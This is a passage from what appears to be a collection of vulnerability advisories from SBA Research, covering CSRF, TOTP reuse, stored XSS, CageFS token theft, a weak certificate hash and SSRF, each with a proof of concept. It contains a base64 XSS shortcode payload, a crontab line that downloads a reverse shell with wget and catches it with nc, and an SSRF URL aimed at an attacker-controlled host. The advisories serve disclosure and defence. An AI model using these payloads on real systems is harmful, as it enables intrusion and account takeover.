| systems, is accessed via a HTTP `GET` request. 63 | Changing the state of the server with `GET` is discouraged in the HTTP 64 | standard, since it is defined to be a *safe* method [1]. 65 | This makes the exploitation of the vulnerability easier, as an attacker 66 | can craft an URL. 67 | If the victim opens this URL, the CSRF attack is carried out and an action 68 | is performed. 69 | 70 | ## Proof of Concept ## 71 | 72 | For example, the following HTTP request disables the alarm in area `00`: 73 | 74 | ```http 75 | GET /statuslive.html?area=00&value=d HTTP/1.1 76 | Host: 192.0.2.1 77 | ``` 78 | 79 | It is vulnerable to CSRF, since it does not apply any CSRF countermeasures. 80 | Therefore, it is possible to craft an URL that performs this action: 81 | 82 | ```text 83 | http://192.0.2.1/statuslive.html?area=00&value=d 84 | ``` 85 | 86 | ## Recommended Countermeasures ## 87 | 88 | We are not aware of a vendor fix yet. Please contact the vendor. 89 | 90 | A generally valid solution against CSRF, which however requires a server-side 91 | state, is the implementation of an unpredictable token that is unique for 92 | each session. 93 | The OWASP project gives further recommendations [2] [3]. 94 | 95 | ## Timeline ## 96 | 97 | * `2024-02-09` Identified the vulnerability in version 1.40.00 98 | * `2024-02-12` First contact to the system owner to acquire more information about the system configuration and version 99 | * `2024-03-08` System owner provided all details on the affected system 100 | * `2024-03-21` First attempt to contact vendor via support email 101 | * `2024-04-03` Second attempt to contact vendor via web form and support email 102 | * `2024-06-19` No reaction from vendor to all previous contact attempts 103 | * `2024-06-19` SBA Research assigned CVE-2024-5676 104 | * `2024-06-19` Public disclosure 105 | 106 | ## References ## 107 | 108 | 1. RFC 7231. HTTP/1.1 Semantics and Content. Safe Methods: 109 | 2. OWASP Cheat Sheet Series. Cross-Site Request Forgery Prevention Cheat Sheet: 110 | 3. OWASP Web Security Testing Guide (WSTG) v4.2. Testing for Cross Site Request Forgery: 111 | 112 | ## Credits ## 113 | 114 | * Jakob Pachmann ([SBA Research](https://www.sba-research.org/)) 115 | * Fabian Funder ([SBA Research](https://www.sba-research.org/)) 116 | -------------------------------------------------------------------------------- /2024/SBA-ADV-20240617-01_CraftCMS_TOTP_Valid_After_Use/README.md: -------------------------------------------------------------------------------- 1 | # Craft CMS - TOTP Token Stays Valid After Use # 2 | 3 | ## Vulnerability Overview ## 4 | 5 | The Craft CMS from version 5.0.0-beta.1 through 5.2.2 allows reuse of TOTP tokens multiple times within the 6 | validity period. 7 | 8 | * **Identifier** : SBA-ADV-20240617-01 9 | * **Type of Vulnerability** : Improper Authentication 10 | * **Software/Product Name** : [Craft CMS](https://craftcms.com) 11 | * **Vendor** : [Pixel & Tonic, Inc.](https://pixelandtonic.com) 12 | * **Affected Versions** : >= 5.0.0-beta.1, <= 5.2.2 13 | * **Fixed in Version** : 5.2.3 14 | * **CVE ID** : CVE-2024-41800 15 | * **CVSS Vector** : CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:N/I:H/A:N 16 | * **CVSS Base Score** : 4.8 (Medium) 17 | 18 | ## Vendor Description ## 19 | 20 | > Craft is a flexible, user-friendly CMS for creating custom digital 21 | > experiences on the web and beyond. 22 | 23 | Source: 24 | 25 | ## Impact ## 26 | 27 | An attacker is able to re-submit a valid TOTP token to establish an 28 | authenticated session. This requires that the attacker has knowledge of the 29 | victim's credentials. 30 | 31 | ## Vulnerability Description ## 32 | 33 | A TOTP token can be used multiple times to establish an authenticated session. 34 | RFC 6238 insists that an OTP must not be used more than once [1]. 35 | 36 | > The verifier MUST NOT accept the second attempt of the OTP after the 37 | > successful validation has been issued for the first OTP, which ensures 38 | > one-time only use of an OTP. 39 | 40 | The OWASP Application Security Verification Standard v4.0.3 (ASVS) reiterates 41 | this property with requirement 2.8.4 [2]. 42 | 43 | > Verify that time-based OTP can be used only once within the validity period. 44 | 45 | It should also be noted that the validity period of an TOTP token is 2 46 | minutes. This makes a successful brute force attack more likely, since the 47 | four tokens are valid at the same time. 48 | 49 | ## Proof of Concept ## 50 | 51 | Start the login process in two different environments e.g. in two different 52 | browsers. Enter the same TOTP in both environments while making sure that 53 | both submissions are made in the timespan where the TOTP is valid. Both 54 | environments should display the dashboard, signaling that the authentication 55 | process has been successful. 56 | 57 | The following request and response pairs show this behavior. The requests are 58 | made from different session (different `CraftSessionId` cookie), but yield 59 | the same response. Therefore, the one-time use requirement of TOTPs has been 60 | shown to be violated. 61 | 62 | Request and response 1: 63 | 64 | ```http 65 | POST /index.php?p=admin%2Factions%2Fauth%2Fverify-totp&v=1718611475335 HTTP/1.1 66 | Host: example.com 67 | Cookie: CraftSessionId=f52a55[...]; CRAFT_CSRF_TOKEN=84046fab20[...]; b355f5550c68c4120bf669f0e80588c6_username=677791f5[...]; 68 | X-Requested-With: XMLHttpRequest 69 | X-Csrf-Token: 3jS9tkBnKBRDJ[...] 70 | Content-Length: 17 71 | Connection: close 72 | 73 | {"code":"101472"} 74 | 75 | HTTP/1.1 200 OK 76 | Content-Type: application/json; charset=UTF-8 77 | Date: Mon, 17 Jun 2024 08:04:35 GMT 78 | [...] 79 | 80 | {"message":"Verification successful."} 81 | ``` 82 | 83 | Request and response 2: 84 | 85 | ```http 86 | POST /index.php?p=admin%2Factions%2Fauth%2Fverify-totp&v=1718611477246 HTTP/1.1 87 | Host: example.com 88 | Cookie: CraftSessionId=221f47[...]; CRAFT_CSRF_TOKEN=2db430[...]; b355f5550c68c4120bf669f0e80588c6_username=677791[...]; 89 | X-Requested-With: XMLHttpRequest 90 | X-Csrf-Token: Raz6Fv[...] 91 | Content-Length: 17 92 | Connection: close 93 | 94 | {"code":"101472"} 95 | 96 | HTTP/1.1 200 OK 97 | Content-Type: application/json; charset=UTF-8 98 | Date: Mon, 17 Jun 2024 08:04:37 GMT 99 | 100 | [...] 101 | 102 | {"message":"Verification successful."} 103 | ``` 104 | 105 | ## Recommended Countermeasures ## 106 | 107 | We recommend to update to version 5.2.3 or later, which applies the following 108 | countermeasure. 109 | 110 | We suggest that TOTPs should loose their validity after they have been used 111 | and only newer token should be accepted. The `Google2FA` library which is 112 | already in use provides such a functionality [3]: 113 | 114 | > An attacker might be able to watch the user entering his credentials and 115 | > one time key. Without further precautions, the key remains valid until it 116 | > is no longer within the window of the server time. In order to prevent 117 | > usage of a one time key that has already been used, you can utilize the 118 | > `verifyKeyNewer` function. 119 | 120 | ## Timeline ## 121 | 122 | * `2024-06-17`: Identified the vulnerability in version 5.1.8 123 | * `2024-06-17`: Contacted the vendor and disclosed the vulnerability 124 | * `2024-06-20`: Started to collaborate with the vendor on a Github Security Advisory (GHSA) 125 | * `2024-06-20`: Release of fixed version 5.2.3 126 | * `2024-07-25`: Public disclosure of GHSA 127 | * `2024-07-25`: Public disclosure of SBA-ADV 128 | 129 | ## References ## 130 | 131 | 1. RFC 6238. TOTP Time-Based One-Time Password Algorithm: 132 | 2. OWASP Application Security Verification Standard (ASVS) v4.0.3. Requirement 2.8.4 Verify that time-based OTP can be used only once within the validity period: 133 | 3. Google2FA. Validation Window: 134 | 4. GitHub Security Advisory. TOTP Token Stays Valid After Use: 135 | 136 | ## Credits ## 137 | 138 | * Fabian Funder ([SBA Research](https://www.sba-research.org/)) 139 | -------------------------------------------------------------------------------- /2019/SBA-ADV-20190913-03_WordPress_Plugin_Events_Manager/README.md: -------------------------------------------------------------------------------- 1 | # WordPress Plugin - Events Manager - Stored XSS # 2 | 3 | ## Vulnerability Overview ## 4 | 5 | The events-manager plugin through 5.9.5 for WordPress (aka Events Manager) 6 | is susceptible to Stored XSS due to improper encoding and insertion of 7 | data provided to the attribute map_style of shortcodes (locations_map 8 | and events_map) provided by the plugin. 9 | 10 | * **Identifier** : SBA-ADV-20190913-03 11 | * **Type of Vulnerability** : Cross-site Scripting 12 | * **Software/Product Name** : [Events Manager](https://wordpress.org/plugins/events-manager/) 13 | * **Vendor** : [Marcus Sykes](https://wp-events-plugin.com) 14 | * **Affected Versions** : <= 5.9.5 15 | * **Fixed in Version** : 5.9.6 16 | * **CVE ID** : CVE-2019-16523 17 | * **CVSSv3 Vector** : AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N 18 | * **CVSSv3 Base Score** : 7.3 (High) 19 | 20 | ## Vendor Description ## 21 | 22 | > Events Manager is a full-featured event registration plugin for WordPress based on the principles of flexibility, reliability and powerful features! 23 | > 24 | > Version 5 now makes events and locations WordPress Custom Post Types, allowing for more possibilities than ever before! 25 | 26 | Active Installations: 100,000+ 27 | 28 | Source: 29 | 30 | ## Impact ## 31 | 32 | By exploiting the documented vulnerability, an authenticated attacker with the 33 | ability to create posts can execute JavaScript code in a victim's browser. 34 | This can be misused, e.g for phishing attacks by displaying a fake 35 | login form and sending the victim's credentials to the attacker. 36 | Furthermore malicious actions can be performed in the context of an authenticated 37 | user. The impact depends on the level of access of the attacked user. 38 | In case of an admin this can lead to the execution of PHP code and the compromise 39 | of the server. 40 | 41 | ## Vulnerability Description ## 42 | 43 | The plugin provides [*shortcodes*][1] to create a map widget e.g. for displaying the 44 | location of an event. Those maps can be visually adjusted by providing 45 | a custom style via the attribute `map_style` in the shortcode. The usage of HTML inside 46 | shortcode attributes is [limited][2] in order to prevent XSS. 47 | However in this case it is possible to inject arbitrary HTML and JavaScript because the 48 | `map_style` attribute expects a base64-encoded JSON-object. This allows bypassing sanitization. 49 | The shortcodes `locations_map` and `events_map` are affected by this problem: 50 | 51 | In `em-shortcode.php` (line 43-56) we can see that the attribute is base64-decoded and then 52 | parsed with json_decode. If the JSON syntax is valid, whitespace is removed and the object 53 | passed to the template as `map_json_style` variable. See the code snippet below: 54 | 55 | ```php 56 | //add JSON style to map 57 | $style = ''; 58 | if( !empty($args['map_style']) ){ 59 | $style= base64_decode($args['map_style']); 60 | $style_json= json_decode($style); 61 | if( is_array($style_json) || is_object($style_json) ){ 62 | $style = preg_replace('/[\r\n\t\s]/', '', $style); 63 | }else{ 64 | $style = ''; 65 | } 66 | unset($args['map_style']); 67 | } 68 | ob_start(); 69 | em_locate_template('templates/map-global.php',true, array('args'=>$args, 'map_json_style' => $style)); 70 | ``` 71 | 72 | In `templates/templates/map-global.php` (line 16-21) the variable is inserted inside a script tag 73 | without further encoding: 74 | 75 | ```php 76 | 82 | ``` 83 | 84 | This allows the injection of a XSS payload. 85 | 86 | [1]: https://codex.wordpress.org/Shortcode_API 87 | [2]: https://codex.wordpress.org/Shortcode_API#HTML 88 | 89 | ## Proof of Concept ## 90 | 91 | To exploit this vulnerability an attacker needs to create or edit a post 92 | and insert one of the shortcodes mentioned above. 93 | In this example we use the `locations_map` shortcode and set the attribute 94 | `map_style` to the base64 encoded value of `{"a":"test\""}`. 95 | This will result in the following shortcode: 96 | 97 | ```text 98 | [locations_map test="" map_style="eyJhIjoidGVzdFwiPC9zY3JpcHQ+PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0PiJ9Cg=="] 99 | ``` 100 | 101 | This shortcode can then be inserted in the post and published by a malicious user. 102 | Anyone visiting the post will be affected by the payload and therefore a victim of the XSS attack. 103 | 104 | ## Recommended Countermeasures ## 105 | 106 | We recommend to properly escape the output by using the encoding functions provided by WordPress, 107 | like the `esc_*`- or `wp_kses_*`-[functions][3]. 108 | 109 | [3]: https://developer.wordpress.org/themes/theme-security/data-sanitization-escaping/#escaping-securing-output 110 | 111 | ## Timeline ## 112 | 113 | * `2019-09-09` Identified the vulnerability 114 | * `2019-09-10` Contacted vendor 115 | * `2019-09-10` Response by vendor about disclosure contact 116 | * `2019-09-10` Vulnerability disclosed to vendor 117 | * `2019-09-10` Vulnerability verified by vendor, public disclosure coordinated 118 | * `2019-09-20` CVE assigned 119 | * `2019-09-23` Suggested fix verified 120 | * `2019-09-27` Plugin update containing fix was released 121 | * `2019-10-16` Public disclosure 122 | 123 | ## References ## 124 | 125 | * 126 | * 127 | * 128 | 129 | ## Credits ## 130 | 131 | * Tobias Fink ([SBA Research](https://www.sba-research.org/)) 132 | -------------------------------------------------------------------------------- /2020/SBA-ADV-20200707-01_CloudLinux_CageFS_Token_Disclosure/README.md: -------------------------------------------------------------------------------- 1 | # CloudLinux CageFS Token Disclosure # 2 | 3 | ## Vulnerability Overview ## 4 | 5 | CloudLinux CageFS 7.1.1-1 or below passes the authentication token as a 6 | command line argument. In some configurations this allows local users to 7 | view the authentication token via the process list and gain code execution 8 | as another user. 9 | 10 | * **Identifier** : SBA-ADV-20200707-01 11 | * **Type of Vulnerability** : Invocation of Process Using Visible Sensitive Information 12 | * **Software/Product Name** : [CloudLinux CageFS](https://www.cloudlinux.com/) 13 | * **Vendor** : CloudLinux Inc. 14 | * **Affected Versions** : <= 7.1.1-1 15 | * **Fixed in Version** : 7.1.2-2 16 | * **CVE ID** : CVE-2020-36771 17 | * **CVSS Vector** : CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 18 | * **CVSS Base Score** : 7.8 (High) 19 | 20 | ## Vendor Description ## 21 | 22 | > CloudLinux OS is the leading platform for multitenancy. It improves 23 | > server stability, density, and security by isolating each tenant and 24 | > giving them allocated server resources. This creates an environment 25 | > that feels more like a virtual server than a shared hosting account. 26 | > By doing so, CloudLinux OS reduces operating costs and churn rates, 27 | > and increases profitability. 28 | 29 | Source: 30 | 31 | ## Impact ## 32 | 33 | If the `lve_namespaces` service or the virtualized proc filesystem 34 | feature is disabled, a local user can obtain the CageFS authentication 35 | token of other users by exploiting the vulnerability documented in this 36 | advisory. In most configurations this allows attackers to gain code 37 | execution as those users. 38 | 39 | ## Vulnerability Description ## 40 | 41 | CloudLinux offers a feature called proxy commands in CageFS environments. 42 | It allows limited execution of commands outside the CageFS environment from 43 | a user restricted within the CageFS envinronment. 44 | 45 | For this purpose a CageFS daemon runs outside of the CageFS environment, 46 | it is accessible via a UNIX socket from within the CageFS environment. 47 | The UNIX socket is handled by `proxyexec`. To make the whole process of 48 | calling a tool outside of the CageFS transparent to the user, wrapper 49 | scripts are placed within CageFS, which in turn call `proxyexec` for 50 | execution of the commands outside of the CageFS environment. 51 | 52 | Those wrapper scripts read the CageFS token from `/var/.cagefs/.cagefs.token` 53 | and pass it to the `proxyexec` command as a command line argument. 54 | 55 | CloudLinux by default enables the virtualized proc filesystem, which 56 | prevents other users from seeing the CageFS token within the process 57 | list. However, if the `lve_namespaces` service is disabled, e.g. the 58 | systemd unit is masked out, or the virtualized proc filesystem is 59 | explicitly disabled, other users can see the CageFS token within the 60 | process list. They can use the CageFS token of other users to talk to 61 | the CageFS daemon via `proxyexec` and the CageFS daemon executes the 62 | commands with the privileges of the supplied authentication token. 63 | 64 | ## Proof of Concept ## 65 | 66 | Let's assume, the `lve_namespaces` service is disabled and we are user 67 | `ftp2406151`: 68 | 69 | ```sh 70 | $ id 71 | uid=935(ftp2406151) gid=935(site2406151) groups=935(site2406151) 72 | ``` 73 | 74 | We list the process list and find another user executing `ping example.org`: 75 | 76 | ```sh 77 | $ ps aux | grep proxyexec 78 | 2094 root 0:00 /usr/sbin/proxyexec -q -d -s /var/lib/proxyexec/cagefs.sock/socket /bin/cagefs.server 79 | 1180646 934 0:00 /usr/sbin/proxyexec -c cagefs.sock ftp1488781 EjlVbSK63ye6dtHs / PING 1180642 example.org 80 | 1180647 root 0:00 /usr/sbin/proxyexec -q -d -s /var/lib/proxyexec/cagefs.sock/socket /bin/cagefs.server 81 | 1181229 ftp24061 0:00 grep proxyexec 82 | ``` 83 | 84 | We now can execute commands as user `ftp1488781` and, for example, view 85 | the crontab: 86 | 87 | ```sh 88 | $ /usr/sbin/proxyexec -c cagefs.sock ftp1488781 EjlVbSK63ye6dtHs / CRONTAB_LIST 0 89 | no crontab for ftp1488781 90 | ``` 91 | 92 | Now we setup a new crontab entry, which downloads a reverse shell and 93 | executes it every minute: 94 | 95 | ```sh 96 | $ echo '* * * * * wget -q -O rshell https://www.example.org/rshell && chmod +x rshell && nohup ./rshell &' | /usr/sbin/proxyexec -c cagefs.sock ftp1488781 EjlVbSK63ye6dtHs / CRONTAB_SAVE 0 97 | ``` 98 | 99 | ```sh 100 | $ /usr/sbin/proxyexec -c cagefs.sock ftp1488781 EjlVbSK63ye6dtHs / CRONTAB_LIST 0 101 | * * * * * wget -q -O rshell https://www.example.org/rshell && chmod +x rshell && nohup ./rshell & 102 | ``` 103 | 104 | Our shell connects back to us and we can execute arbitrary commands as 105 | the other user: 106 | 107 | ```sh 108 | $ nc -l -p 1234 109 | id 110 | uid=934(ftp1488781) gid=934(site1488781) groups=934(site1488781) 111 | ``` 112 | 113 | ## Recommended Countermeasures ## 114 | 115 | We recommend to avoid passing sensitive information as a command line 116 | argument. Instead, `proxyexec` should directly read the CageFS token 117 | from the file `/var/.cagefs/.cagefs.token` and pass it to the CageFS 118 | daemon via the UNIX socket. 119 | 120 | ## Timeline ## 121 | 122 | * `2020-07-07`: identification of vulnerability in version 7.0.6-1 123 | * `2020-07-10`: initial vendor contact 124 | * `2020-07-13`: initial vendor response 125 | * `2020-07-13`: disclosed vulnerability to vendor security contact 126 | * `2020-09-02`: vendor released version 7.1.2-2 to testing 127 | * `2020-09-28`: vendor released version 7.1.2-2 to production 128 | * `2020-10-02`: request CVE from MITRE 129 | * `2022-01-04`: MITRE declined request as it falls in the scope of Red Hat 130 | * `2024-01-19`: request CVE from Red Hat 131 | * `2024-01-22`: Red Hat assigned CVE-2020-36771 132 | * `2024-01-25`: public disclosure 133 | 134 | ## References ## 135 | 136 | * CloudLinux OS Documentation. Virtualized /proc filesystem: 137 | * CageFS 7.1.2-2 beta: 138 | * CageFS 7.1.2-2 production: 139 | 140 | ## Credits ## 141 | 142 | * David Lisa Gnedt ([SBA Research](https://www.sba-research.org/)) 143 | -------------------------------------------------------------------------------- /2025/SBA-ADV-20250325-02_Cyberduck_Mountain_Duck_Weak_Hash/README.md: -------------------------------------------------------------------------------- 1 | # Cyberduck and Mountain Duck - Weak Hash Algorithm for Certificate Fingerprint # 2 | 3 | ## Vulnerability Overview ## 4 | 5 | Cyberduck and Mountain Duck improper handle TLS certificate pinning for 6 | untrusted certificates (e.g., self-signed), since the certificate 7 | fingerprint is stored as SHA-1, although SHA-1 is considered weak and 8 | should be replaced with SHA-256 or SHA-512. 9 | 10 | * **Identifier** : SBA-ADV-20250325-02 11 | * **Type of Vulnerability** : CWE-328: Use of Weak Hash 12 | * **Software/Product Name** : [Cyberduck](https://cyberduck.io/) and [Mountain Duck](https://mountainduck.io/) 13 | * **Vendor** : [iterate GmbH](https://iterate.ch/) 14 | * **Affected Versions** : Cyberduck <= 9.1.6 and Mountain Duck <= 4.17.5 15 | * **Fixed in Version** : Cyberduck 9.1.7 and Mountain Duck 4.17.6 16 | * **CVE ID** : CVE-2025-41256 17 | * **GHSA** : GHSA-688c-vjrc-84rv 18 | * **CVSS Vector** : CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N 19 | * **CVSS Base Score** : 7.4 (High) 20 | 21 | ## Vendor Description ## 22 | 23 | > Cyberduck is a libre server and cloud storage browser for Mac and Windows 24 | > with support for FTP, SFTP, WebDAV, Amazon S3, OpenStack Swift, Backblaze 25 | > B2, Microsoft Azure & OneDrive, Google Drive and Dropbox. 26 | 27 | Source: 28 | 29 | > Mountain Duck lets you mount server and cloud storage as a disk in Finder 30 | > on macOS and the File Explorer on Windows. Open remote files with any 31 | > application and work like on a local volume. 32 | 33 | Source: 34 | 35 | ## Impact ## 36 | 37 | As only the SHA-1 fingerprint of the certificate is stored and SHA-1 is 38 | considered weak, an attacker could provoke a hash collision and thus perform 39 | machine-in-the-middle attack on the TLS encrypted connection, resulting in a 40 | total loss of confidentiality and integrity of the connection. 41 | 42 | ## Vulnerability Description ## 43 | 44 | When permanently accepting an unknown TLS certificate for a specified 45 | service, Cyberduck and Mountain Duck store the certificate fingerprint 46 | to their own configuration file. 47 | The certificate fingerprint is stored as SHA-1, which is considered weak. 48 | 49 | ## Proof of Concept ## 50 | 51 | 1. Setup a TLS encrypted *WebDAV* server, which uses a self-signed 52 | certificate (in this case at the IP address `10.42.42.1`). 53 | 54 | 2. Create a new connection to the server in Cyberduck or Mountain Duck. 55 | 56 | 3. The following certificate error is shown, since the self-signed 57 | certificate is not trusted: 58 | 59 | ![Certificate error](./images/Certificate%20Error.png) 60 | 61 | To always trust this certificate for this connection, `Always Trust` 62 | must be checked before clicking `Continue`. 63 | 64 | 4. Afterwards the following dialog shows up, asking if you want to install 65 | the certificate: 66 | 67 | ![Security warning](./images/Security%20Warning.png) 68 | 69 | By clicking `No` the mounting process gets canceled, 70 | therefore to continue clicking `Yes` is required. 71 | 72 | 5. Now, the fingerprint of the certificate is stored at the configuration 73 | file of the application: 74 | 75 | Cyberduck (`C:\Users\\AppData\Roaming\Cyberduck\Cyberduck.user.config`): 76 | 77 | ```xml 78 | False 79 | 80 | [...] 81 | 82 | 83 | 84 | ``` 85 | 86 | Moutain Duck (`C:\Users\\AppData\Roaming\Cyberduck\Mountain Duck.user.config`): 87 | 88 | ```xml 89 | False 90 | 91 | 92 | 93 | 94 | 95 | 96 | ``` 97 | 98 | The application stores the SHA-1 certificate fingerprint, although SHA-1 is 99 | considered weak. 100 | An attacker could provoke a hash collision and thus perform 101 | machine-in-the-middle attack on the TLS encrypted connection, resulting in a 102 | total loss of confidentiality and integrity of the connection. 103 | 104 | ## Recommended Countermeasures ## 105 | 106 | We recommend to update to Cyberduck version 9.1.7 / Mountain Duck version 107 | 4.17.6 or later, which applies the following countermeasure. 108 | 109 | When permanently accepting a TLS certificate for a specific service, the 110 | application should store the certificate fingerprint using a modern hashing 111 | algorithm, such as SHA-256 or SHA-512. 112 | 113 | ## Timeline ## 114 | 115 | * `2025-03-25` Identified the vulnerability in Cyberduck version 9.1.3 116 | and Mountain Duck version 4.17.3 117 | * `2025-03-27` Initial contact attempt and disclosure of vulnerability to 118 | iterate GmbH via GitHub Security Advisory 119 | * `2025-04-09` Vendor accepted this report 120 | * `2025-06-20` Vendor created a private fork to address the problem 121 | * `2025-06-23` Vendor merged the patch to main 122 | * `2025-06-24` Vendor released Cyberduck 9.1.7 / Mountain Duck 4.17.6 123 | * `2025-06-24` Public disclosure via GHSA 124 | * `2025-06-25` SBA Research assigned CVE-2025-41256 125 | * `2025-06-25` Public disclosure via CVE 126 | 127 | ## References ## 128 | 129 | * GitHub Security Advisory. Cyberduck and Mountain Duck - Weak Hash Algorithm for Certificate Fingerprint: 130 | 131 | ## Credits ## 132 | 133 | * Andreas Boll ([SBA Research](https://www.sba-research.org/)) 134 | * Thomas Kostal ([SBA Research](https://www.sba-research.org/)) 135 | -------------------------------------------------------------------------------- /2022/SBA-ADV-20220127-01_Shibboleth_IdP_OIDC_OP_Plugin_SSRF/README.md: -------------------------------------------------------------------------------- 1 | # Shibboleth Identity Provider OIDC OP Plugin Server-Side Request Forgery # 2 | 3 | ## Vulnerability Overview ## 4 | 5 | Shibboleth Identity Provider OIDC OP plugin 3.0.3 or below is prone to a 6 | server-side request forgery (SSRF) vulnerability due to an insufficient 7 | restriction of the `request_uri` parameter. This allows unauthenticated 8 | attackers to interact with arbitrary third-party HTTP services. 9 | 10 | * **Identifier** : SBA-ADV-20220127-01 11 | * **Type of Vulnerability** : Server-Side Request Forgery (SSRF) 12 | * **Software/Product Name** : [Identity Provider OIDC OP Plugin](https://shibboleth.atlassian.net/wiki/spaces/IDPPLUGINS/pages/1376878976/OIDC+OP) 13 | * **Vendor** : Shibboleth Consortium 14 | * **Affected Versions** : <= 3.0.3 15 | * **Fixed in Version** : 3.0.4 16 | * **CVE ID** : CVE-2022-24129 17 | * **CVSS Vector** : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N 18 | * **CVSS Base Score** : 8.6 (High) 19 | 20 | ## Vendor Description ## 21 | 22 | > The OIDC OP plugin is the successor to the original GEANT-funded add-on to 23 | > Shibboleth and is now available as an offically-supported plugin for IdP 24 | > V4.1 and above. It provides conformant OIDC OP functionality alongside the 25 | > SAML and CAS support previously native to the IdP software. 26 | 27 | Source: 28 | 29 | ## Impact ## 30 | 31 | An unauthenticated attacker can interact with arbitrary third-party HTTP 32 | services by exploiting the vulnerability documented in this advisory. This 33 | might lead to manipulation of internal services accessible by the server 34 | running the affected software. Moreover, an attacker can send malicious 35 | requests to external services, while the server running the affected 36 | software appears as the source of the attack. 37 | 38 | ## Vulnerability Description ## 39 | 40 | The OIDC specification allows an OIDC RP to send authentication requests via 41 | a request object. These request objects can be either sent directly as 42 | `request` parameter or indirectly by passing an URL as `request_uri` 43 | parameter. In the latter case, the OIDC provider fetches the request 44 | object via an HTTP-GET request from the specified URL. 45 | 46 | The Shibboleth OIDC OP plugin supports this behavior, but does not validate 47 | the passed `request_uri` before issuing the HTTP-GET request. 48 | An unauthenticated attacker might exploit this to perform server-side 49 | request forgery and issue malicious HTTP-GET requests to services reachable 50 | by the server running the plugin. For example, an attacker could try to 51 | access protected internal services which are not reachable from public 52 | or adjacent networks, otherwise. 53 | 54 | The Shibboleth OIDC OP plugin does not return information from the issued 55 | HTTP response to the attacker when it cannot parse the response as JWS. 56 | Therefore, the ability of an attacker is mostly limited to initiate 57 | operations on HTTP services. 58 | Additionally, an attacker can find out the exact Shibboleth IdP version by 59 | letting the OIDC OP plugin connect to an attacker-controlled service and 60 | inspecting the user agent header of the HTTP request. 61 | 62 | ## Proof of Concept ## 63 | 64 | We set up an Shibboleth IdP version 4.1.5 with the OIDC OP plugin 3.0.3 65 | and deployed the following client metadata. 66 | 67 | ```json 68 | [ 69 | { 70 | "scope":"openid email", 71 | "redirect_uris":["https://demorp.example.org/redirect_uri"], 72 | "client_id":"demo_rp", 73 | "client_secret":"topsecret", 74 | "response_types":["code"], 75 | "grant_types":["authorization_code"], 76 | "request_uris":["https://example.org"] 77 | } 78 | ] 79 | ``` 80 | 81 | In the client metadata we first specified no `request_uris` parameter. We 82 | then also tried to set the `request_uris` parameter to `https://example.org` 83 | (see above), both leading to the following behavior. 84 | 85 | We issued an authentication request via the following URL specifying an 86 | `request_uri` parameter pointing to an attacker-controlled server: 87 | 88 | ```plain 89 | https://idp.example.org/idp/profile/oidc/authorize?client_id=demo_rp&request_uri=https://na1wjvvodi7fua6a3ulaxtq48vel2a.burpcollaborator.net 90 | ``` 91 | 92 | On the attacker-controlled server we received the following request: 93 | 94 | ```http 95 | GET / HTTP/1.1 96 | Host: na1wjvvodi7fua6a3ulaxtq48vel2a.burpcollaborator.net 97 | Connection: Keep-Alive 98 | User-Agent: ShibbolethIdp/4.1.5 OpenSAML/4.1.1 99 | Accept-Encoding: gzip,deflate 100 | Connection: close 101 | ``` 102 | 103 | Additionally, the Shibboleth IdP logged the following output: 104 | 105 | ```plain 106 | 2022-01-28 20:22:58,290 - 127.0.0.1 - ERROR [net.shibboleth.idp.plugin.oidc.op.profile.impl.SetRequestObjectToResponseContext:144] - Profile Action SetRequestObjectToResponseContext: Unable to parse request object from request_uri, Invalid JWT serialization: Missing dot delimiter(s) 107 | ``` 108 | 109 | This indicates that the OIDC OP plugin sent the HTTP request, but could not 110 | parse the HTTP response. 111 | 112 | ## Recommended Countermeasures ## 113 | 114 | As a countermeasure for the vendor we recommend to only accept the 115 | `request_uri` parameter when an allow list is configured in the client 116 | metadata and the supplied `request_uri` matches the client metadata. 117 | Additionally, the allow list should not be arbitrarily configurable via 118 | the dynamic client-registration endpoint. 119 | 120 | According to the vendor this countermeasure was implemented in version 3.0.4, 121 | therefore we recommend users to use versions 3.0.4 or later. 122 | 123 | ## Timeline ## 124 | 125 | * `2022-01-27`: identification of vulnerability in version 3.0.3 126 | * `2022-01-27`: initial vendor contact 127 | * `2022-01-27`: disclosed vulnerability to vendor security contact 128 | * `2022-01-28`: vendor acknowledged vulnerability 129 | * `2022-01-29`: request CVE from MITRE 130 | * `2022-01-30`: MITRE assigned CVE-2022-24129 131 | * `2022-01-31`: vendor released version 3.0.4 132 | * `2022-01-31`: public disclosure 133 | 134 | ## References ## 135 | 136 | * OpenID Connect specification: 137 | * Vendor security advisory: 138 | 139 | ## Credits ## 140 | 141 | * David Gnedt ([SBA Research](https://www.sba-research.org/)) 142 | * Andreas Bernauer-Puchegger ([SBA Research](https://www.sba-research.org/)) 143 | * Franz Wieshaider ([SBA Research](https://www.sba-research.org/)) 144 | -------------------------------------------------------------------------------- /2018/SBA-ADV-20180425-01_phpWhois_Code_Execution/README.md: -------------------------------------------------------------------------------- 1 | # phpWhois PHP Code Injection # 2 | 3 | ## Vulnerability Overview ## 4 | 5 | phpWhois and some of its forks in versions before 5.1.0 are prone to a 6 | code injection vulnerability due to insufficient sanitization of returned 7 | WHOIS data. This allows attackers controlling the WHOIS information of a 8 | requested domain to execute arbitrary PHP code in the context of the 9 | application. 10 | 11 | * **Identifier** : SBA-ADV-20180425-01 12 | * **Type of Vulnerability** : Code Injection 13 | * **Software/Product Name** : phpWhois 14 | * **Vendor** : [phpwhois.org](http://www.phpwhois.org/), 15 | [abcdmitry](https://github.com/phpWhois/phpWhois), 16 | [jsmitty12](https://github.com/jsmitty12/phpWhois), 17 | [webalternative](https://github.com/webalternative/phpWhois) 18 | and others 19 | * **Affected Versions** : phpwhois.org: 4.2.2 and probably prior, 20 | as well as the following forks 21 | abcdmitry: 4.2.5 and probably prior, 22 | jsmitty12: 5.0.2 and probably prior 23 | * **Fixed in Version** : jsmitty12: 5.1.0 24 | * **CVE ID** : CVE-2015-5243 25 | * **CVSSv3 Vector** : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 26 | * **CVSSv3 Base Score** : 9.8 (Critical) 27 | 28 | ## Vendor Description ## 29 | 30 | > This package contains a Whois (RFC954) library for PHP. It allows a 31 | > PHP program to create a Whois object, and obtain the output of a 32 | > whois query with the lookup function. 33 | 34 | Source: 35 | 36 | ## Impact ## 37 | 38 | By exploiting the 